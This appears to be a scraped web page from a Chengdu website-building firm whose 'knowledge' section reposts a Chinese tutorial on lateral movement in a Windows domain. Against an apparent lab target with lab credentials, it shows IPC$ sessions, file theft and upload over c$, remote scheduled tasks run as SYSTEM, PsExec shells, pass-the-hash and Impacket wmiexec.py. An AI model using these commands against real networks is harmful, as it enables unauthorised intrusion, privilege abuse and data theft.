网创优客建站品牌官网
为成都网站建设公司企业提供高品质网站建设
热线:028-86922220
成都专业网站建设公司

定制建站费用3500元

符合中小企业对网站设计、功能常规化式的企业展示型网站建设

成都品牌网站建设

品牌网站建设费用6000元

本套餐主要针对企业品牌型网站、中高端设计、前端互动体验...

成都商城网站建设

商城网站建设费用8000元

商城网站建设因基本功能的需求不同费用上面也有很大的差别...

成都微信网站建设

手机微信网站建站3000元

手机微信网站开发、微信官网、微信商城网站...

建站知识

当前位置:首页 > 建站知识

如何使用内网中横向移动的命令行工具

这篇文章主要讲解了“如何使用内网中横向移动的命令行工具”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“如何使用内网中横向移动的命令行工具”吧!

创新互联公司专注于企业成都营销网站建设、网站重做改版、万年网站定制设计、自适应品牌网站建设、HTML5建站成都做商城网站、集团公司官网建设、外贸网站制作、高端网站制作、响应式网页设计等建站业务,价格优惠性价比高,为万年等各大城市提供网站开发制作服务。

目标机器: 192.168.101.157

一、IPC$连接

IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。

调出命令行窗口,可以先执行net use查看已建立的连接

如何使用内网中横向移动的命令行工具

执行以下命令与目标建立ipc$连接

net use \\192.168.101.157(目标ip) /u:god(域名)\Administrator(用户名) hongrisec@2020(密码)

如何使用内网中横向移动的命令行工具执行成功会返回命令成功完成

之后可以使用dir命令列出目标文件夹文件,如执行以下命令列出c盘下文件夹

dir \\192.168.101.157\c$

如何使用内网中横向移动的命令行工具

列出c盘下phpStudy目录的文件

dir \\192.168.101.157\c$\phpStudy

如何使用内网中横向移动的命令行工具

如果想下载文件则执行以下命令,将phpshao.dll文件下载存放至temp文件夹处

copy \\192.168.101.157\c$\phpStudy\phpshao.dll C:\Windows\temp

如何使用内网中横向移动的命令行工具

如何使用内网中横向移动的命令行工具

同理,如果想要上传文件的话则执行

copy F:\test.txt \\192.168.101.157\c$

如何使用内网中横向移动的命令行工具

可以看到已经将文件传输上去了

也可以通过计划任务执行系统命令,首先执行下面命令创建一个名为test2的计划任务

schtasks /create /s 192.168.101.157 /tn test2 /sc minute /mo 1 /tr "C:\Windows\System32\cmd.exe /c 'whoami > C:\Windows\temp\test2.txt'" /ru system /f /u god\Administrator /p hongrisec@2020

如何使用内网中横向移动的命令行工具

之后执行以下命令,立即执行计划任务

schtasks /run /s 192.168.101.157 /i /tn test2 /u god\Administrator /p hongrisec@2020

如何使用内网中横向移动的命令行工具

执行成功之后使用type命令查看执行内容的回显

type \\192.168.101.157\c$\Windows\temp\test2.txt

如何使用内网中横向移动的命令行工具

二、psexec

也可以通过psexec去连接目标,不过动静有点大,会在目标机器上起一个服务,产生大量日志

可以在这里下载

如何使用内网中横向移动的命令行工具

执行以下命令获取一个交互式的shell,如果无法建立连接,尝试使用管理员身份执行

PsExec64.exe -accepteula \\192.168.101.157(目标IP) -u god(域)\Administrator(用户名) -p hongrisec@2020(密码) -s cmd.exe

如何使用内网中横向移动的命令行工具也可以执行以下命令,使用hash进行连接

psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 god/Administrator@192.168.1.1 "whoami"

当然msf里面也有模块可以通过psexec与目标连接

exploit/windows/smb/psexec

三、wmiexec.py连接

可以在这里下载工具包

直接执行以下命令就可以建立连接了

python wmiexec.py god(域)/administrator(用户名):hongrisec@2020(密码)@192.168.101.157(目标IP)

如何使用内网中横向移动的命令行工具

也可以使用hash去连接目标,稍微变一下就可以了

感谢各位的阅读,以上就是“如何使用内网中横向移动的命令行工具”的内容了,经过本文的学习后,相信大家对如何使用内网中横向移动的命令行工具这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是创新互联,小编将为大家推送更多相关知识点的文章,欢迎关注!


本文题目:如何使用内网中横向移动的命令行工具
文章URL:http://bjjierui.cn/article/gcoici.html

其他资讯